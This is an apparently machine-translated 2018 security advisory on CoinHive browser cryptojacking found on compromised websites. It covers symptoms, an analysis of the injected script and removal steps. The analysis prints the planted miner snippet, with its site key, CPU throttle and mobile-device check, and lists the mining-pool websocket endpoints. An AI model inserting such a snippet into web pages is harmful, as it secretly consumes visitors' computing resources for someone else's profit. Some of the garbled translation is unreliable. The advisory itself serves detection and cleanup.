CoinHive intelligent web mining two or three thing-vulnerability warning-the black bar safety net

ID MYHACK58:62201891198
Type myhack58
Reporter 佚名
Modified 2018-08-18T00:00:00


Mining has now become black hat profit, the main means of recently Internet by chance found part of the website is hung it to exist after the web mining behavior, different from the conventional virusoperating systemin the mining acts, pages mainly on the site hanging on the malicious JS scripts, access to the site that triggers mining operation. Currently many of the web mining mainly in the CoinHive way more, typically mining user in an active way to directly use C or other language constructs miner client for CPU or GPU computing Hash. The front end of the mining the user in a passive or active way unknowingly or knowingly use the browser's CPU or GPU. 0×1 phenomenon Visit malicious sites when the CPU spiked to close the site after a return to normal levels. ! Closed after: ! 0×2 source code analysis View page source code can be found in the part of the mining code, through the simple to determine the non-mobile browser after that start mining operation. ! The browser process consumes large CPU resources: ! To view the browser process, can be in the memory address found in the mining address traces to: ! The main references of the mining code The details are in the referenced JS script, only using 70%of CPU resources. script src="">script> script> var miner = new CoinHive. Anonymous('Jgv7noixIKHmJ7IIhAR9jySAwG3ZU8vt', {throttle: 0.7}); if (! miner. isMobile() && ! miner. didOptOut(14400)) { miner. start(); } script> Jgv7noixIKHmJ7IIhAR9jySAwG3ZU8vt: the CoinHive among the wallet address; throttle: the browser the CPU threshold, is adjusted to a suitable threshold the user will be very difficult to pay attention to the browser's hash rate is abuse. coinhive. min. js source code is as follows: ! Mining script to use WebSocket with the mining pool to communicate, the portion of the mining pool nodes are as follows: wss://ws001. coinhive. com/proxy wss://ws002. coinhive. com/proxy wss://ws003. coinhive. com/proxy wss://ws004. coinhive. com/proxy wss://ws005. coinhive. com/proxy wss://ws006. coinhive. com/proxy wss://ws007. coinhive. com/proxy wss://ws008. coinhive. com/proxy wss://ws009. coinhive. com/proxy wss://ws010. coinhive. com/proxy wss://ws011. coinhive. com/proxy wss://ws012. coinhive. com/proxy ! Mining script allows the automatic adjustment of the thread number: this. _throttle=Math. max(0,Math. min(.99,this. params. throttle||0)); this. _stopOnInvalidOptIn=false; this. _waitingForAuth=false; this. _selfTestSuccess=false; this. _verifyThread=null; this. _autoThreads={ enabled:!! this. params. autoThreads, interval:null, adjustAt:null, adjustEvery:1e4, stats:{} }; this. _tab={ ident:Math. random()*16777215/0, mode:CoinHive. IF_EXCLUSIVE_TAB,g race:0, waitReconnect:0, lastPingReceived:0, interval:null }; ! 0×3 solution: 1. According to the page after viewing the page source code, search for the CoinHive, the Miner, etc. keywords can be quickly locate to the interface, use Notepad or the web editor to remove the mining of the critical code. 2. Visit the small cinema website time more carefully their CPU performance.